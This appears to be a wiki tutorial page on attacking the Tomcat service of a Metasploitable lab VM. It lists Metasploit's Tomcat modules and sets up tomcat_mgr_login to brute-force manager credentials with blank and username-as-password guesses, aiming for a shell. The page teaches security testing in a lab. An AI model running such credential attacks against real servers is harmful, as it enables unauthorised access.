Tomcat Service

We will attempt to abuse the Tomcat server in order to obtain access to the web server. The end goal is to obtain a shell on the web server.

Just a reminder of what the nmap scan returned about Apache Tomcat and Coyote:

10.0.0.27  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1

JSP stands for JavaServer Pages. All this means is, web pages accessed through port 8180 will be assembled by a Java web application.

What is tomcat

Apache Tomcat provides software to run Java applets in the browser. The nmap scan didn't return the version, so that's probably the first thing we'll want to figure out.

What is coyote

Coyote is a stand-alone web server that provides servlets to Tomcat applets. That is, it functions like the Apache web server, but for JavaServer Pages (JSP).

From the description of Coyote on the Tomcat page [1], it sounds like this server will be as susceptible to denial of service attacks as the Apache web server was.

Metasploit Modules for Tomcat

msf > search tomcat

Matching Modules
================

   Name                                                         Disclosure Date  Rank       Description
   ----                                                         ---------------  ----       -----------
   auxiliary/admin/http/tomcat_administration                                    normal     Tomcat Administration Tool Default Access
   auxiliary/admin/http/tomcat_utf8_traversal                                    normal     Tomcat UTF-8 Directory Traversal Vulnerability
   auxiliary/admin/http/trendmicro_dlp_traversal                                 normal     TrendMicro Data Loss Prevention 5.5 Directory Traversal
   auxiliary/dos/http/apache_commons_fileupload_dos             2014-02-06       normal     Apache Commons FileUpload and Apache Tomcat DoS
   auxiliary/dos/http/apache_tomcat_transfer_encoding           2010-07-09       normal     Apache Tomcat Transfer-Encoding Information Disclosure and DoS
   auxiliary/dos/http/hashcollision_dos                         2011-12-28       normal     Hashtable Collisions
   auxiliary/scanner/http/tomcat_enum                                            normal     Apache Tomcat User Enumeration
   auxiliary/scanner/http/tomcat_mgr_login                                       normal     Tomcat Application Manager Login Utility
   exploit/multi/http/struts_code_exec_classloader              2014-03-06       manual     Apache Struts ClassLoader Manipulation Remote Code Execution
   exploit/multi/http/struts_default_action_mapper              2013-07-02       excellent  Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
   exploit/multi/http/struts_dev_mode                           2012-01-06       excellent  Apache Struts 2 Developer Mode OGNL Execution
   exploit/multi/http/tomcat_mgr_deploy                         2009-11-09       excellent  Apache Tomcat Manager Application Deployer Authenticated Code Execution
   exploit/multi/http/tomcat_mgr_upload                         2009-11-09       excellent  Apache Tomcat Manager Authenticated Upload Code Execution
   exploit/multi/http/zenworks_configuration_management_upload  2015-04-07       excellent  Novell ZENworks Configuration Management Arbitrary File Upload
   post/windows/gather/enum_tomcat                                               normal     Windows Gather Apache Tomcat Enumeration

We will focus on three modules:

auxiliary/scanner/http/tomcat_mgr_login
exploit/multi/http/tomcat_mgr_deploy
exploit/multi/http/tomcat_mgr_upload

tomcat mgr login

This module is, obviously, for logging into Tomcat.

Here is info on this module from the Rapid7 website: https://www.rapid7.com/db/modules/auxiliary/scanner/http/tomcat_mgr_login

Printing out the various options, it looks like a brute force method:

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > show info

       Name: Tomcat Application Manager Login Utility
     Module: auxiliary/scanner/http/tomcat_mgr_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  MC <mc@metasploit.com>
  Matteo Cantoni <goony@nothink.org>
  jduck <jduck@metasploit.com>

Basic options:
  Name              Current Setting                                                                 Required  Description
  ----              ---------------                                                                 --------  -----------
  BLANK_PASSWORDS   false                                                                           no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false                                                                           no        Add all passwords in the current database to the list
  DB_ALL_USERS      false                                                                           no        Add all users in the current database to the list
  PASSWORD                                                                                          no        A specific password to authenticate with
  PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
  Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                                                                            yes       The target address range or CIDR identifier
  RPORT             8080                                                                            yes       The target port
  STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host
  TARGETURI         /manager/html                                                                   yes       URI for Manager login. Default is /manager/html
  THREADS           1                                                                               yes       The number of concurrent threads
  USERNAME                                                                                          no        A specific username to authenticate as
  USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false                                                                           no        Try the username as the password for all users
  USER_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
  VERBOSE           true                                                                            yes       Whether to print output for all attempts
  VHOST                                                                                             no        HTTP server virtual host

Description:
  This module simply attempts to login to a Tomcat Application Manager
  instance using a specific user/pass.

References:
  http://cvedetails.com/cve/2009-3843/
  http://www.osvdb.org/60317
  http://www.securityfocus.com/bid/37086
  http://cvedetails.com/cve/2009-4189/
  http://www.osvdb.org/60670
  http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html
  http://www.zerodayinitiative.com/advisories/ZDI-09-085
  http://cvedetails.com/cve/2009-4188/
  http://www.securityfocus.com/bid/38084
  http://cvedetails.com/cve/2010-0557/
  http://www-01.ibm.com/support/docview.wss?uid=swg21419179
  http://cvedetails.com/cve/2010-4094/
  http://www.zerodayinitiative.com/advisories/ZDI-10-214
  http://cvedetails.com/cve/2009-3548/
  http://www.osvdb.org/60176
  http://www.securityfocus.com/bid/36954
  http://tomcat.apache.org/
  http://cvedetails.com/cve/1999-0502/

We'll definitely want to try blank passwords. Let's set some options:

msf auxiliary(tomcat_mgr_login) > workspace metasploitable
[*] Workspace: metasploitable
msf auxiliary(tomcat_mgr_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf auxiliary(tomcat_mgr_login) > set RHOSTS 10.0.0.27
RHOSTS => 10.0.0.27
msf auxiliary(tomcat_mgr_login) > set USER_AS_PASS true
USER_AS_PASS => true

Now fire it up:

msf auxiliary(tomcat_mgr_login) > run

Flags

Metasploit any and all resources related to metasploit on this wiki MSF - on the metasploit framework generally Category:Metasploit - pages labeled with the "Metasploit" category label MSF/Wordlists - wordlists that come bundled with Metasploit MSFVenom - msfvenom is used to craft payloads Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload. Category:Security  · Category:Metasploit  · Category:Kali Flags  · Template:MetasploitFlag  · e

Metasploitable: The Red Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack. Metasploitable Databases: Exploiting MySQL with Metasploit: Metasploitable/MySQL Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres Metasploitable Networking: Exploiting VSFTP Backdoor: Metasploitable/VSFTP SSH Penetration by Brute Force: Metasploitable/SSH/Brute Force SSH Penetration with Keys: Metasploitable/SSH/Keys SSH Penetration with Metasploit: Metasploitable/SSH/Exploits Brute-Forcing /etc/shadow File: Metasploitable/John Shadow File Exploiting NFS: Metasploitable/NFS Exploiting DNS Bind Server: Metasploitable/DNS Bind Metasploitable Services: distcc: Metasploitable/distcc Metasploitable Apache: Exploiting Apache (with Metasploit): Metasploitable/Apache Exploiting Apache (with Python): Metasploitable/Apache/Python Tor's Hammer DoS Attack: Metasploitable/TorsHammer * Apache DAV: Metasploitable/Apache/DAV * Apache Tomcat and Coyote: Metasploitable/Apache/Tomcat and Coyote Metasploitable Memory: General approach to memory-based attacks: Metasploitable/Memory Investigating memory data: Metasploitable/Volatile Data Investigation Dumping Memory from Metasploit: Metasploitable/Dumping Memory Metasploitable Fuzzing: (Have not done much work on fuzzing Metasploitable...) Fuzzing  · American Fuzzy Lop Category:Security  · Category:Metasploit  · Category:Metasploitable  · Category:Kali Flags  · Template:MetasploitableRedTeamFlag  · e

Metasploitablue: The Blue Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the BLUE TEAM's methods for defending Metasploitable: defending against and responding to intrusions. Hence the name, Metasploita-blue. Overview: Metasploitable/Defenses Metasploitable/Defenses/Stopping  · Metasploitable/Defenses/Detecting Metasploitable On-Machine Defenses: Linux Volatile Data System Investigation: Metasploitable/Volatile Data Investigation Linux Artifact Investigation: Metasploitable/Artifact Investigation Linux Iptables Essentials: Metasploitable/Iptables Firewall Assurance and Testing: Metasploitable/Firewall Password Assessment: Metasploitable/Password Assessment Standard Unix Ports: Unix/Ports Metasploitable Networking Defenses: Netcat and Cryptcat (Blue Team): Metasploitable/Netcat and Metasploitable/Cryptcat Nmap (Blue Team): Metasploitable/Nmap Network Traffic Analysis: Metasploitable/Network Traffic Analysis Suspicious Traffic Patterns: Metasploitable/Suspicious Traffic Patterns Snort IDS: Metasploitable/Snort Category:Security  · Category:Metasploit  · Category:Metasploitable  · Category:Kali Flags  · Template:MetasploitableBlueTeamFlag  · e